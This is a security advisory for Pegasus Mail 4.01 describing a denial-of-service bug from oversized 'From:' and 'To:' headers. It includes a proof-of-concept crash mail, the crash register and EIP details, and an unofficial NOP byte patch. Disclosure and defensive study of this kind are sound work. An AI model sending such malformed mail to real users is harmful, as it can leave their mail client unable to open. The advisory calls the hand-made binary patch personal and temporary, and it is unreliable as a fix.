Application: Pegasus mail (http://www.pmail.com) Version: 4.01 and possibly previous Bug: Bad management of "From:" and "To:" mail headers Risk: DoS and in some cases the client cannot be opened until the user have not cancelled the saved mail in the mail folder Author: Auriemma Luigi (e-mail: firstname.lastname@example.org)
Sections: 1) Introduction 2) Bug 3) The Code 4) Fix 5) Philosophy
Pegasus mail seems to be a diffused free mail client for Windows (32 and 16 bit) and Dos. The version I have tested is the latest in this moment: 4.01 for Win32. The OS used for do the test is Win98SE (so something can differ a bit from who have NT/2K/XP or others) Naturally I have contacted all the supports mail addresses specified in the program but I have received no answers, so there is not official fix available. However this is not a big problem because an advisory is also useful for keep the attention of the vulnerable program's author.
The bug is in the management of the headers "From:" and "To:" that are in the mail received. Pegasus mail can manage only max 259 chars in these two fields, so the problem is when an attacker send some charaters more.
For example, the following is a proof-of-concept mail:
/mail/ From: myname <250'A's> To: test@localhost Subject: Good crash
You cannot see this text 8-)
(the 260 chars are counted after "From:" so we have " myname <" + 250 'A's + ">" = 260, and with the "To:" header is identical)
Now there are some different results about the crash of the program, and this seems caused by our activated program options. It can crash when we want to open the mail, or it will crash just when we want to check our mails and the great problem is when we reopen the client because the mail is cached in the user mail folder so the problem continue until he don't delete this bad mail.
Another problem is that the malformed mail seems to be undeleteable from the program, because when you want to delete it from the trash Pegasus crash again. So after moved the mail in the trash, restart the program so it delete the mail automatically without crash.
Now I want to show what are the errors (yes we get 2 errors, one after the other), and the different situation about the field we want to exploit:
"From:" The first error happen when the EIP reach 0x004157c0 and the exploited header have filled EDX register.
"To:" The first error happen when the EIP reach 0x004c668c and the exploited header have filled EAX and EDI registers.
The second happen in Kernel32.dll at EIP 0xbffc04d4.
3) The Code
In attachment you can found: a) a little proof-of-concept for send a mail with the "From:" field oversized. The source code and the exe are for Win. b) a patcher for the version 4.01 of the program that use my personal and unofficial fix (useful if someone don't know how to use an hex editor). c) an Italian version of this advisory.
No official patch. See the Pegasus mail site (http://www.pmail.com) for updates.
I have done a PERSONAL and NOT OFFICIAL fix for the version 4.01:
File: winpm-32.exe address value 14DC3 90 14DC4 90 14DD7 90 14DD8 90
The NOP trick run well and seems that all the functions are ok, but remember that it is only temporary!
I'm really hopeful about the FULL-DISCLOSURE, because with that "everyone" can know the real effects of an attack, the real danger of a bug, someone can learn a bit of programming (I have learn a bit of C from the source code of some exploits) and it's useful for all the people that are hopeful in this type of disclosure. No secrets!
Any type of feedback is really welcome!